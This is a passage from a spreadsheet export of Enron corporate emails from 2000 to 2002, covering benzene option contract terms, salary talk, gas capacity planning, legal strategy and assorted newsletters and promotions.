tm_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Sever, Stephanie =20_x000D_
Sent:=09Monday, October 08, 2001 1:47 PM_x000D_
To:=09Moran, Tom; Lebrocq, Wendi_x000D_
Subject:=09FW: US Benzene Fin Options - Please review and reply_x000D_
_x000D_
What do you think about coping profiles from US Benzene Fin Swap?_x000D_
_x000D_
Thanks,_x000D_
Stephanie_x000D_
 -----Original Message-----_x000D_
From: =09Lozano, Melba =20_x000D_
Sent:=09Friday, October 05, 2001 3:28 PM_x000D_
To:=09Hagelmann, Bjorn; Adams, Matthew_x000D_
Cc:=09Lees, Lisa; Sever, Stephanie; Sweitzer, Tara; Blumenthal, Jeff; Musch=_x000D_
, Susan; Meredith, Kevin_x000D_
Subject:=09FW: US Benzene Fin Options - Please review and reply_x000D_
_x000D_
 &lt;&lt; File: ENA Financial GTC (credit).doc &gt;&gt;     &lt;&lt; File: ENA Financial GTC.=_x000D_
doc &gt;&gt;=20_x000D_
Please provide a sigma factor for the following Product Type:_x000D_
_x000D_
US Benzene Option  :_x000D_
Puts_x000D_
calls_x000D_
straddles_x000D_
_x000D_
The products are Asian Financial Options quoted in lots:  1lot =3D 1,000 ba=_x000D_
rrels =3D 42,000 gallons. =20_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Melba_x000D_
_x000D_
_x000D_
CALL_x000D_
US Benz Fin Opt  CMAI Spot AsC4.5        Oct01           USD/GL-L_x000D_
_x000D_
A financial Option Transaction with Enron North America Corp., under which =_x000D_
the Seller receives the Premium and the Buyer receives the Cash Settlement =_x000D_
Amount. Each calendar month during the Term of the Transaction will be a De=_x000D_
termination Period, provided that if the Term of the Transaction is less th=_x000D_
an one calendar month the Determination Period shall be the Term of the Tra=_x000D_
nsaction. The Notional Quantity per Determination Period shall be calculate=_x000D_
d from the volume submitted by Counterparty on the website in accordance wi=_x000D_
th the unit of measure. The Premium shall equal the product of (i) the pric=_x000D_
e submitted by Counterparty via the Website, multiplied by (ii) the Notiona=_x000D_
l Quantity per Determination Period, multiplied by (iii) the number of Dete=_x000D_
rmination Periods during the Term of the Transaction. The Payment Date for =_x000D_
the Premium shall be 2 business days after the Trade Date of the Transactio=_x000D_
n. The Payment Date(s) for the Cash Settlement Amount shall be 5 business d=_x000D_
ays after the Cash Settlement Amount is determinable. Where this Transactio=_x000D_
n is a Call Option, the Cash Settlement Amount shall be the product of (a) =_x000D_
the Notional Quantity per Determination Period, multiplied by (b) the great=_x000D_
er of (i) zero, or (ii) the Index minus the Strike Price. Where this Transa=_x000D_
ction is a Put Option, the Cash Settlement Amount shall be the product of (=_x000D_
a) the Notional Quantity per Determination Period, multiplied by (b) the gr=_x000D_
eater of (i) zero, or (ii) the Strike Price minus the Index. Where this Tra=_x000D_
nsaction is a Straddle Option, the Cash Settlement Amount shall be the prod=_x000D_
uct of (a) the Notional Quantity per Determination Period, multiplied by (b=_x000D_
) the absolute difference between the Strike Price and the Index._x000D_
The Term of the Transaction shall be from the Effective Date of 01 Oct 2001=_x000D_
 to the Termination Date of 31 Oct 2001._x000D_
The Exercise Period(s) shall be the last Trading Day of the Determination P=_x000D_
eriod. The Index for a month shall be the average of the means of the high =_x000D_
and low price in Cents/Gallon of Benzene published under the headings "Pric=_x000D_
es for Period Ending [DATE]: United States: Benzene)" under the caption "SP=_x000D_
OT: Cents/Lb." in each issue of Chemical Market Associates, Inc.'s Aromatic=_x000D_
s Market Report (Weekly) that reports prices effective for such month._x000D_
The price is quoted in US Dollars per unit of volume, which will be the Con=_x000D_
tractual Currency._x000D_
The unit of measure against which the volume is shown shall be 42,000 gallo=_x000D_
ns per month._x000D_
The Option style and type shall be an Asian Call, ("AsC")._x000D_
Automatic Exercise is Applicable._x000D_
The strike price for the transaction is 4.5 United States Dollar/Gallon Lot=_x000D_
s._x000D_
_x000D_
PUT_x000D_
US Benz Fin Opt  CMAI Spot AsP4.5        Oct01           USD/GL-L_x000D_
_x000D_
A financial Option Transaction with Enron North America Corp., under which =_x000D_
the Seller receives the Premium and the Buyer receives the Cash Settlement =_x000D_
Amount. Each calendar month during the Term of the Transaction will be a De=_x000D_
termination Period, provided that if the Term of the Transaction is less th=_x000D_
an one calendar month the Determination Period shall be the Term of the Tra=_x000D_
nsaction. The Notional Quantity per Determination Period shall be calculate=_x000D_
d from the volume submitted by Counterparty on the website in accordance wi=_x000D_
th the unit of measure. The Premium shall equal the product of (i) the pric=_x000D_
e submitted by Counterparty via the Website, multiplied by (ii) the Notiona=_x000D_
l Quantity per Determination Period, multiplied by (iii) the number of Dete=_x000D_
rmination Periods during the Term of the Transaction. The Payment Date for =_x000D_
the Premium shall be 2 business days after the Trade Date of the Transactio=_x000D_
n. The Payment Date(s) for the Cash Settlement Amount shall be 5 business d=_x000D_
ays after the Cash Settlement Amount is determinable. Where this Transactio=_x000D_
n is a Call Option, the Cash Settlement Amount shall be the product of (a) =_x000D_
the Notional Quantity per Determination Period, multiplied by (b) the great=_x000D_
er of (i) zero, or (ii) the Index minus the Strike Price. Where this Transa=_x000D_
ction is a Put Option, the Cash Settlement Amount shall be the product of (=_x000D_
a) the Notional Quantity per Determination Period, multiplied by (b) the gr=_x000D_
eater of (i) zero, or (ii) the Strike Price minus the Index. Where this Tra=_x000D_
nsaction is a Straddle Option, the Cash Settlement Amount shall be the prod=_x000D_
uct of (a) the Notional Quantity per Determination Period, multiplied by (b=_x000D_
) the absolute difference between the Strike Price and the Index._x000D_
_x000D_
The Term of the Transaction shall be from the Effective Date of 01 Oct 2001=_x000D_
 to the Termination Date of 31 Oct 2001._x000D_
_x000D_
The Exercise Period(s) shall be the last Trading Day of the Determination P=_x000D_
eriod.  The Index for a month shall be the mean of the average of the high =_x000D_
and low price in Cents/Gallon of Benzene published under the headings "Pric=_x000D_
es for Period Ending [DATE]: United States: Benzene)" under the caption "SP=_x000D_
OT: Cents/Lb." in each issue of Chemical Market Associates, Inc.'s Aromatic=_x000D_
s Market Report (Weekly) that reports prices effective for such month._x000D_
The price is quoted in US Dollars per unit of volume, which will be the Con=_x000D_
tractual Currency._x000D_
The unit of measure against which the volume is shown shall be 42,000 gallo=_x000D_
ns per month._x000D_
The Option style and type shall be an Asian Put, ("AsP")._x000D_
Automatic Exercise is Applicable._x000D_
The strike price for the transaction is 4.5 United States Dollar/Gallon Lot=_x000D_
s.</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 05:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>=?ANSI_X3.4-1968?Q?Best_Buy_Chooses_Plumtree_for_?=_x000D_
 =?ANSI_X3.4-1968?Q?Corporate_Employees=0F=3DScalable_P?=</t>
  </si>
  <si>
    <t>Best Buy Chooses Plumtree for Corporate Employees=0F=3DScalable Portal_x000D_
Solution 'TagZone' Will Offer Business-to-Employee And Business-to-Business_x000D_
Information Services and Application Integration_x000D_
_x000D_
********************************_x000D_
_x000D_
_x000D_
********************************_x000D_
_x000D_
View complete article at:=20_x000D_
http://www.stockselector.com/newsarticle.asp?symbol=3DBBY&amp;article=3D2085245=_x000D_
0_x000D_
_x000D_
BEST BUY CO INC  22.313_x000D_
_x000D_
EDEN PRAIRIE, Minn. and SAN FRANCISCO, Dec 11, 2000 /PRNewswire via COMTEX/=_x000D_
 --_x000D_
Best Buy Co., Inc. (NYSE: BBY), the number one retailer of consumer=20_x000D_
electronics,_x000D_
and corporate portal software maker Plumtree Software, today announced that=_x000D_
=20_x000D_
Best_x000D_
Buy has chosen the Plumtree Corporate Portal as the plat_x000D_
_x000D_
Other Companies Involved:_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
N/A_x000D_
_x000D_
To unsubscribe, please go to=20_x000D_
http://www.stockselector.com/modifyportfolio.asp?portnumber=3D1_x000D_
_x000D_
, Copyright 1998-99, StockSelector.com</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 22:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'rshapiro@enron.com', 'ken@kdscommunications.com', 'hgovenar@govadv.com', 'jalamo@enron.com', 'msmith1@enron.com', 'paul.kaufman@enron.com', 'james.d.steffes@enron.com', 'steven.j.kean@enron.com', 'smara@enron.com', 'jennifer.thome@enron.com', 'leslie.lawner@enron.com', 'eletke@enron.com', 'harry.kingerski@enron.com', 'acomnes@enron.com', 'kdenne@enron.com', 'jdasovic@enron.com', 'bhansen@lhom.com', 'janel.guerrero@enron.com', 'sandra.mccubbin@enron.com', 'mday@gmssr.com', 'rfrank@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>SBX 31</t>
  </si>
  <si>
    <t>Attached, please find the amended version of SBX 31  (Burton) which passed _x000D_
off of the Assembly floor last night.? The bill may  be heard on the Senate _x000D_
floor as early as today.? The Legislature will need  to terminate the first _x000D_
special session once this bill passes out of the Senate  in order for this _x000D_
bill to take effect in 90 days._x000D_
?_x000D_
http://info.sen.ca.gov/pub/bill/sen/sb_0001-0050/sbx1_31_bill_20010507_amended_x000D_
_asm.pdf</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 02:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: CIAC</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 09/06/2000 _x000D_
09:49 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Susan Scott                           09/06/2000 09:47 AM_x000D_
	_x000D_
_x000D_
To: Lorraine Lindberg/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: CIAC_x000D_
_x000D_
Fyi_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 09/06/2000 _x000D_
09:47 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Susan Scott                           09/06/2000 09:22 AM_x000D_
	_x000D_
_x000D_
To: Robert Guthrie/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: CIAC  _x000D_
_x000D_
Robert, in response to your question, I don't know who the El Paso tax _x000D_
contact is, but I'll find out &amp; let you know.  Thanks again._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 14:03:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: SE Hourly</t>
  </si>
  <si>
    <t>I am locking up all of the hourly leads and having a discussion with them regarding there top performers and contract status this week.   It is becoming increasingly difficult to put non-managers under contract, so that is my challenge for the hourly group.   Having said that, I concur with your suggestions._x000D_
_x000D_
I am assuming you are presenting Narsima and Edith there promotion and contract packages.   Please confirm._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Herndon, Rogers  _x000D_
Sent:	Monday, August 06, 2001 3:21 PM_x000D_
To:	Presto, Kevin M._x000D_
Subject:	SE Hourly_x000D_
_x000D_
Kevin -_x000D_
_x000D_
I spoke to Ed Baughman aearlier while on 31 and I wanted to follow-up with a comment on the SE Hourly group. _x000D_
_x000D_
I think those guys have done a pretty good job in the first half and have really made the effort to get to know their customers.  I thinkk Juan received a promotion and I hope he is going to get a decent bump in base with that.  However, I am not sure what the status is with Rudy and Miguel.  I think (not sure) that they are under contract and are probably paid a little light vs. the competition.  I would view the going rate for good hourly guys as about $85k based on what I have heard lately.  May stagnate a little bit with the outlook._x000D_
_x000D_
Do you think it is worth throwing these two guys a small incentive mid-year to let them know that we are aware of the competition and appreciate the work they are doing.  I am suggesting something small, around $5k each.  What do you think.  I know it is probably not a good day to discuss this but i think it is worth some consideration, and for all I know you have already addressed it._x000D_
_x000D_
Also, I would like to postpone our Monday meeting.  I have to interview someone and would like to get with Jay and Mark Jackson and then discuss RSO and T&amp;D positions._x000D_
_x000D_
RH</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 01:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Aquila, Duke</t>
  </si>
  <si>
    <t>Have you had a chance to review the credit comments for these two?  _x000D_
_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 07:24:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hme@clara.co.uk'})</t>
  </si>
  <si>
    <t>Re: m227</t>
  </si>
  <si>
    <t>_x000D_
Hi Jeff_x000D_
 _x000D_
Thank you for visiting the JAG website and for your  enquiry. The prices for M227 is $7,500. It is in excellent condition with no  damage or repairs. If you need any further info  or images just let me know._x000D_
 _x000D_
Kind regards_x000D_
 _x000D_
Gavin Morganwww.jagdecorativearts.com   _x000D_
 _x000D_
 _x000D_
----- Original Message ----- _x000D_
From:  Shankman, Jeffrey A.  _x000D_
To: jag@hme.clara.co.uk  _x000D_
Sent: Tuesday, May 01, 2001 12:16  AM_x000D_
Subject: m227_x000D_
I am interested to know the price and condition of this  piece._x000D_
Regards,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 15:44:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'apurvis@mfah.org'})</t>
  </si>
  <si>
    <t>MFAH Fine Arts Friday!  2/1/02</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
The Museum of Fine Arts, Houston_x000D_
Conoco &amp; KRTS 92.1_x000D_
_x000D_
invite you, your co-workers and your friends to_x000D_
_x000D_
Fine Arts Friday_x000D_
The Professional's Happy Hour_x000D_
_x000D_
Featuring DJ Andy "Champa" Moore (TLP), heard around town at Hyperia,_x000D_
Ricebar, and The Davenport._x000D_
_x000D_
Also, view The Living Edge:  Richard Pousette-Dart, Works on Paper, the_x000D_
first exhibition devoted exclusively to the artist's activities as a_x000D_
draftsman.  One of the youngest Abstract Expressionists, Pousette-Dart was_x000D_
also one of the most individualistic.  This exhibition of 132 drawings_x000D_
covers his entire career, including a recently discovered cache of early_x000D_
works that even his widow had never seen._x000D_
_x000D_
_x000D_
FRIDAY, February 1, 2002_x000D_
In the Cafe Express of the museum's Audrey Jones Beck Building (5601 Main_x000D_
Street)_x000D_
Free admission_x000D_
6:00 - 8:30 p.m._x000D_
Complimentary hors d'oeuvres &amp; cash bar_x000D_
Come as you are_x000D_
_x000D_
For more information, call Amy Purvis at (713) 639-7570._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 13:10:43 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve"> icruise.com &lt;http://www.i-cruise.com/flash/images/flash_leftheader.gif&gt; flash &lt;http://www.i-cruise.com/flash/images/flash_rightheader.gif&gt;	_x000D_
 flashborder &lt;http://www.i-cruise.com/flash/images/flash_leftborder.gif&gt;	  &lt;http://www2.i-cruise.com/images/spacer.gif&gt;_x000D_
Dear icruise member,_x000D_
Cruises, cruises and more cruises, that's all we dream about during February! This is peak booking season and things are off to a spectacular start. The cruise lines are still uncertain of the summer months and that means OPPORTUNITY for you. In essence prices have risen, but not by much...at least not yet. FLASH, the consummate opportunist, begins with a fabulous 4th of July holiday cruise aboard the Carnival Triumph. Just $603 gets you aboard from New York!_x000D_
_x000D_
Next we offer the unbeatable service of Holland America aboard the Maasdam. All your soft drinks and fancy coffees are FREE, hors' doeuvres before dinner and only $780 from Ft. Lauderdale. We end with the cool winds of Alaska aboard the beautiful Norwegian Wind. Can you believe just $847 and you're aboard for a serene 7day cruise. Of course all FLASH prices include port charges._x000D_
_x000D_
Alex Aliksanyan_x000D_
President/CEO	 flashborder &lt;http://www.i-cruise.com/flash/images/flash_sideheader.g! if&gt;	_x000D_
  &lt;http://www.i-cruise.com/flash/names/carnivaltriumphh.GIF&gt;	  &lt;http://www.i-cruise.com/flash/logos/carnivl.GIF&gt;	  &lt;http://www.i-cruise.com/flash/shots/CarnivalTriumphcl_fl.jpg&gt;	_x000D_
  &lt;http://www.i-cruise.com/flash/lifestyle/images/bye.jpg&gt;Carnival Cruise Lines, Carnival Triumph, from $ 603.00 per person 4 day cruise to Halifax, Nova Scotia sailing roundtrip from New York Rate includes port charges. . _x000D_
_x000D_
Inside cabin or $713 Ocean View. 4th of July weekend ...ports: Day at Sea,Halifax,Day at Sea,New York  Sail date(s) 7/4/02  &lt;http://res.i-cruise.com/resEntry.jsp?ShipName=Carnival+Triumph&amp;Len=4&amp;date=7/4/02&amp;ST=Day+at+Sea|Halifax|Day+at+Sea|New+York&amp;LST=&amp;DST=&amp;DP=New+York&gt;, Limited time! click here for itinerary &lt;http://www.i-cruise.com/cgi-bin/flashport.cgi?groupId=8432&amp;InDate=7/4/02&gt; _x000D_
_x000D_
_x000D_
  &lt;http://www.i-cruise.com/flash/images/flash_blackline.gif&gt;_x000D_
  &lt;http://www.i-cruise.com/flash/names/maasdamh.GIF&gt;	  &lt;http://www.i-cruise.com/flash/logos/hollanl.GIF&gt;	  &lt;http://www.i-cruise.com/flash/shots/Maasdamcl_fl.jpg&gt;	_x000D_
  &lt;http://www.i-cruise.com/flash/lifestyle/images/beach.jpg&gt;Holland America Line, Maasdam, from $ 780.00 per person 7 day Western Caribbean cruise sailing roundtrip from Ft. Lauderdale. Port charges included . _x000D_
_x000D_
Inside or $960 Ocean view. ...ports: Day at Sea,Cozumel,Georgetown,Montego Bay,Day at Sea,Half Moon Cay,Ft. Lauderdale.  Sail date(s) 3/17/02  &lt;http://res.i-cruise.com/resEntry.jsp?ShipName=Maasdam&amp;Len=7&amp;date=3/17/02&amp;ST=Day+at+Sea|Cozumel|Georgetown|Montego+Bay|Day+at+Sea|Half+Moon+Cay|Ft.+Lauderdale.&amp;LST=&amp;DST=&amp;DP=Ft.+Lauderdale&gt;, 4/7/02  &lt;http://res.i-cruise.com/resEntry.jsp?ShipName=Maasdam&amp;Len=7&amp;date=4/7/02&amp;ST=Day+at+Sea|Cozumel|Georgetown|Ocho+Rios|Day+at+Sea|Half+Moon+Cay|Ft.+Lauderdale.&amp;LST=&amp;DST=&amp;DP=Ft.+Lauderdale&gt;, Limited time! click here for itinerary &lt;http://www.i-cruise.com/cgi-bin/flashport.cgi?groupId=8432&amp;InDate=3/17/02&gt; _x000D_
_x000D_
_x000D_
  &lt;http://www.i-cruise.com/flash/images/flash_blackline.gif&gt;_x000D_
  &lt;http://www.i-cruise.com/flash/names/norwegianwindh.GIF&gt;	  &lt;http://www.i-cruise.com/flash/logos/norwegl.GIF&gt;	  &lt;http://www.i-cruise.com/flash/shots/NorwegianWindcl_fl.jpg&gt;	_x000D_
  &lt;http://www.i-cruise.com/flash/lifestyle/images/dawn.jpg&gt;Norwegian Cruise Line, Norwegian Wind, from $ 847.00 per person 7 day cruise to Alaska sailing roundtrip from Vancouver. Port charges included . _x000D_
_x000D_
Inside or great rates for ocean view ...ports: Inside Passage,Juneau,Skagway,Haines,Glacier Bay,Ketchikan,Inside Passage,Vancouver  Sail date(s) 5/13/02  &lt;http://res.i-cruise.com/resEntry.jsp?ShipName=Norwegian+Wind&amp;Len=7&amp;date=5/13/02&amp;ST=Inside+Passage|Juneau|Skagway|Haines|Glacier+Bay|Ketchikan|Inside+Passage|Vancouver&amp;LST=&amp;DST=&amp;DP=Vancouver&gt;, Limited time! click here for itinerary &lt;http://www.i-cruise.com/cgi-bin/flashport.cgi?groupId=9318&amp;InDate=5/13/02&gt; _x000D_
_x000D_
_x000D_
  &lt;http://www.i-cruise.com/flash/images/flash_blackline.gif&gt;_x000D_
Remember all our offers are space and time limited, so do not wait._x000D_
If it sounds too good to be true, then it will be gone by tomorrow! 	_x000D_
_x000D_
To take yourself off our FLASH specials mailing list please click here &lt;http://www2.i-cruise.com/FlashUnsubscribe.htm&gt; and follow instructions_x000D_
	_x000D_
_x000D_
All prices are per person, double occupancy, subject to availability, change without notice, and capacity-controlled. Prices do not include airfare, air taxes (unless otherwise indicated) or government taxes/fees. Prices do not include port taxes._x000D_
	_x000D_
 i-cruise.com &lt;http://www.i-cruise.com/flash/images/flash_bot.gif&gt;	</t>
  </si>
  <si>
    <t>Tue, 12 Sep 2000 02:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: ONE WEEK till Pajama Pub Crawl</t>
  </si>
  <si>
    <t>i won 3 of 4 sunday afternoon, lost 50 sunday night and lost 80 last night.  _x000D_
struggled at the end.  going out thurs?</t>
  </si>
  <si>
    <t>Wed, 19 Jul 2000 06:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.lydecker@enron.com', 'richard.sanders@enron.com', 'brian.vass@enron.com'})</t>
  </si>
  <si>
    <t>nsm</t>
  </si>
  <si>
    <t>divide and conquer strategy devised with paul aronzon at milbank:_x000D_
1. i am getting local thai counsel. have email richard out to bruce lundstrum _x000D_
re. we will file a claim even tho not submitted to cedrac procedures._x000D_
2.brian is getting a hold of jim ajello to have him call the other c _x000D_
bondholders to alert them as to the aug. 7 filing deadline since we were _x000D_
holding hands with them._x000D_
3.paul is calling cleary to document the handshake deal on what the c holders _x000D_
will get from the bs._x000D_
4.when that happens brian you and jim will need to call back the other c _x000D_
bondholders._x000D_
5.richard can you have the paralegal working on the case (was it linda?) pull _x000D_
the underwriting agreement, the shareholders agreement and the management _x000D_
agreement and anywhere else we think there may be an indemnity to file any _x000D_
indemnity claim we can think of? also can you do a short description of the _x000D_
lawsuit to put in the proof of claim??_x000D_
6.paul is getting a general update of the status. of the case and the _x000D_
facility. _x000D_
_x000D_
_x000D_
_x000D_
Lisa J. Mellencamp_x000D_
Enron North America Corp._x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 09:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: Rocky Grass Academy Waiting List</t>
  </si>
  <si>
    <t xml:space="preserve">Hey babe.  I called you last nite re: ROI model, but only got the answering _x000D_
machine.  Forward along to me and I'll take a peek and get back to you.  _x000D_
How's the face doing?  When do you leave on travel?_x000D_
_x000D_
_x000D_
_x000D_
	Cameron Sellers &lt;cameron@perfect.com&gt;_x000D_
	03/20/2001 05:12 PM_x000D_
		 _x000D_
		 To: "'PP'" &lt;psellers@pacbell.net&gt;, "'Scott Laughlin'" &lt;scottwl@hotmail.com&gt;, _x000D_
"'Jeff.Dasovich@enron.com'" &lt;Jeff.Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: Rocky Grass Academy Waiting List_x000D_
_x000D_
FYI_x000D_
_x000D_
_x000D_
Cameron Sellers_x000D_
Vice President, Business Development_x000D_
PERFECT_x000D_
1860 Embarcadero Road - Suite 210_x000D_
Palo Alto, CA 94303_x000D_
cameron@perfect.com_x000D_
650.798.3366 (direct dial)_x000D_
650.269.3366 (cell)_x000D_
650.858.1095 (fax)_x000D_
_x000D_
-----Original Message-----_x000D_
From:    Matthew Bretz [mailto:circlex@earthlink.net] _x000D_
Sent:   Monday, March 19, 2001 11:06 PM_x000D_
To:   sally@bluegrass.com_x000D_
Subject:   Rocky Grass Academy Waiting List_x000D_
_x000D_
Hiya,_x000D_
_x000D_
Sorry to be a pest but...._x000D_
Can you get any idea from Steve's past experience whether the rest of my_x000D_
friends who are on witing lists are liable to get into their workshops?_x000D_
Scott Laughlin  Mandolin_x000D_
Jeff Dasovitch  Guitar_x000D_
Prentiss Sellars  Banjo_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Matty_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 03:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Nom for February 6, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0206.xls)_x000D_
_x000D_
 - HPLN0206.xls</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 15:24:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>Trading Track Contact</t>
  </si>
  <si>
    <t>Adrianne Engler</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 18:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.fairley@enron.com', 'jennifer.bagwell@enron.com', 'edith.cross@enron.com', 'mathew.gimble@enron.com', 'ruth.concannon@enron.com'})</t>
  </si>
  <si>
    <t>Ft. Pierce Gas Capacity Assumptions</t>
  </si>
  <si>
    <t xml:space="preserve">The following basic assumptions concerning gas capacity requirements for the Fort Pierce project were confirmed today at a meeting attended by Dave Fairley, Ed McMichael, Ruth Concannon, Mark Breese, Eric Boyt, and Charlie Weldon.   (NOTE:  The heat rates and MW are subject to change pending final engineering evaluation.  The intent of this note is to document the overall runtime assumptions.)_x000D_
_x000D_
1) During the summertime months of May through September, the plant is expected to run 16 hours per day in a mode where  Enron's 200 MW are dispatched as are Ft. Pierce's 82MW._x000D_
_x000D_
2)  Enron will purchase summertime capacity only sufficient to allow running 200 MW for 16 hours per day at our "bought-down" heat rate of 6690.  This equals 22,300 MMBTU/day and will allow for taking the full daily capacity in only a 16 hour period (6% per hour)  The table below summarizes the monthly capacity requirements:_x000D_
_x000D_
_x000D_
_x000D_
   MONTH	Total Capacity Needed By Enron	Ft. Pierce Capacity (from FGU)	Phase VI Capacity 	Capacity From East Desk	_x000D_
May	22,300	0	22,300	0	_x000D_
June	22,300	0	22,300	0	_x000D_
July	22,300	0	22,300	0	_x000D_
August	22,300	0	22,300	0	_x000D_
September	22,300	0	22,300	0	_x000D_
_x000D_
_x000D_
  NTOE:  Prior to Phase VI completion, the project will purchase capacity from the East Desk._x000D_
_x000D_
3)  Ft. Pierce will use its existing FT via FGU to secure its gas requirements at the 9500 contractual heat rate for the 16 hours it is dispatched in the summer._x000D_
_x000D_
4)  For the winter months of October through April, the plant is expected to run 16 hours per day in a mode where Ft. Pierce is not dispatched, thus leaving Enron with 282MW at the overall plant heat rate of 7500.  This equates to 35,251 MMBTU/day and allows for taking the full capacity in only 16 hours (6% per hour)_x000D_
_x000D_
5)  Because Ft. Pierce will not be dispatched during the winter, their unused capacity via FGU will be available for Enron.  These amounts differ by month as summarized in the table below._x000D_
_x000D_
6) Enron will purchase wintertime capacity only sufficient to allow running 282 MW for 16 hours per day at a 7500 heat rate, less the monthly capacities available from Ft. Pierce via FGU.  These non-FGU purchased quantities will come from the Phase VI capacity and the East Desk as shown below:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
   MONTH	Total Capacity Needed By Enron	Ft. Pierce Capacity (from FGU)	Phase VI Capacity (Nov-Mar = 28% of Summer)	Capacity From East Desk	_x000D_
October	35,251	14,665	22,300	0	_x000D_
November	35,251	14,595	6,244	14,412	_x000D_
December	35,251	14,895	6,244	14,112	_x000D_
January	35,251	16,547	6,244	12,460	_x000D_
February	35,251	15,317	6,244	13,690	_x000D_
March	35,251	15,317	6,244	13,690	_x000D_
April	35,251	15,317	22,300	0	_x000D_
_x000D_
_x000D_
NOTE:  Prior to Phase VI completion , the project will purchase capacity from the East Desk._x000D_
_x000D_
7)  Backup documentation supporting the hourly gas requirement in each dispatch mode is attached to this memo._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 20:04:35 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
As you may be aware, Enron Corp. is a member of the Official Unsecured Creditors' Committee appointed in the Pacific Gas and Electric Company bankruptcy case. Michael Tribolet with the Risk Assessment and Control Group is Enron's designated representative on the committee and he is being assisted by Lisa Mellencamp in the Enron North America Corp. legal group. Please be advised that they will be restricted from disclosing certain of the information that they receive._x000D_
_x000D_
Attached are Ethical Wall Procedures regarding confidential information that Enron may receive as a member of the committee. It is important that you read the procedures promptly, print the Employee Certification attached and sign and return the Employee Certification to the Compliance Department as directed._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 30 May 2001 14:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'steven.krimsky@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Kay / Steve:_x000D_
_x000D_
Attached are my comments. I've tried to address Kay's concerns below, and _x000D_
agree with them wholeheartedly. From a commercial perspective, paragraph 6 is _x000D_
a non-starter._x000D_
_x000D_
Let's discuss. Thanks._x000D_
_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Wednesday, May 30, 2001 6:36 PM_x000D_
To: Krimsky, Steven; Jacoby, Ben_x000D_
Subject: Deerfield development agreement_x000D_
_x000D_
Here are my initial comments:_x000D_
_x000D_
There's no clear triggering event which would expedite the internal approval _x000D_
process.  For instance, paragraph 3 is a current obligation (re _x000D_
landscaping).  It would be easier to process this agreement if the _x000D_
effectiveness of this agreement commences when we  file for a building _x000D_
permit.  I understand that we would have to pay some of this prior to the _x000D_
time the permit is issued, but again, magic words help._x000D_
_x000D_
Paragraph 6 on right of first refusal for power.  Looks like a free call for _x000D_
the next 30 years.  Just want to make sure you've bought in on this.  Other _x000D_
than the obvious valuation impact, it could impact a purchaser's ability to _x000D_
obtain project financing._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 09:13:19 -0800 (PST)</t>
  </si>
  <si>
    <t>Silicon Valley Business Ink : Empowering Silicon Valley Security_x000D_
 and Terrorism Conference</t>
  </si>
  <si>
    <t xml:space="preserve">Silicon Valley Business Ink :: Empowering Silicon Valley EventDear Silicon_x000D_
